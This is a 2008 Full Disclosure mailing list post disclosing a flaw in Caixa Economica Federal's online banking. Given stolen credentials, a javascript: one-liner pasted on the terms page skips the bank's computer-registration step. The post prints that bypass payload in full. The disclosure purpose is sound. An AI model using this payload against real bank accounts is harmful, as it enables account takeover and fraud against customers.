Full Disclosure mailing list archives
Brazilian Bank (Caixa Economica Federal) vuln
From: "H2G-Labs Information Security" <h2glabs.infosec () gmail com>
Date: Thu, 19 Jun 2008 10:43:08 -0300
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Hi folks, some brazilian banks has implementing a system based in computer identification (like a PC register). The system have some vulns and can be easily exploited. I am trying to contact the Caixa Economica Federal (http://www.caixa.gov.br) without success. If the attacker have the USERNAME and the PASSWORD of the user account, the attacker can log in on the bank account without identify the computer. To this, after enter the USERNAME and PASSWORD of account, pute the code in browser (in agree terms page): javascript:document.forms[0].onsubmit='';document.forms[0].navegacao.value='16';document.forms[0].submit();void(0); And you will be logged in, without need register/identify you machine. I hope the CAIXA team solve this problem hurry. Sorry to my bad english, I am brazilian. Regards... - -- H2G-Labs Information Security Igor Marcel - Information Security Consultant H2GLabs.InfoSec "at" Gmail.com -----BEGIN PGP SIGNATURE----- Version: GnuPG (PRIVATE) Comment: H2G-Labs Information Security iQIVAwUBSFpijMJBTfehHgWwAQp0ZBAAjpHW3keLOAuPvF91Jb8JSktRWgRy+q5p PnhuiDXMaflWSUSVWQic24BStRYGv3RXCK8OKQdVMhVwcfG8LIFBWndYopwKUDx3 esGjTMZBuwoGnT3kIOjpFsygucGY89rNePfNduoJDY8NGeQCWe04TbzkeR1xUliT LHqd3rpsgvd6p7jQu9/Ai1+1BDAi9p34toAxGm5RzfXNzr69DT6Jkuq8mSfGnPiZ +roQEXI/6JQNoZhhWKYCGlwzXVFyQUCZVQ7IgcqjL+0RtsmhkGpw2VlG4enIY4UZ eqo1eqZdsFmooHnMgDnorR8OQQrq+/20JbFy3pVBoOfh/9HPntFYZnBJVTRqGGKL Tt9LzlQz5eMpLE2c74nz0b5FeSOLFoKyT/eyzX0R5yfLiVH7BKaa4egejjZcjXwh Vtv6L0BL67iAmL7iTQiJ9EjOY2PFKmSsdwpEOv8iCbzk6rK0p0JKKBjrRN1OT4e2 02yVvzglDoLJymPwHtuQDudwPnJ1lTJE3+5gK0pUWfWxhqe/Rq7u6J4f1Cs7N05r aSaSQFlklarsi7xs3IQPlICejMq0dEcGlmnsXbD9XGurSt9KBeRO55wkAaA5p7T7 ncyEsfEidFEl5fQstVuuvG9Gf+94Q64Skluq8+e6awJXc1nf1xT0O4hJErQhzg4u HVP+cm14G8A= =wJAX -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Brazilian Bank (Caixa Economica Federal) vuln H2G-Labs Information Security (Jun 19)
- <Possible follow-ups>
- Re: Brazilian Bank (Caixa Economica Federal) vuln H2G-Labs Information Security (Jun 20)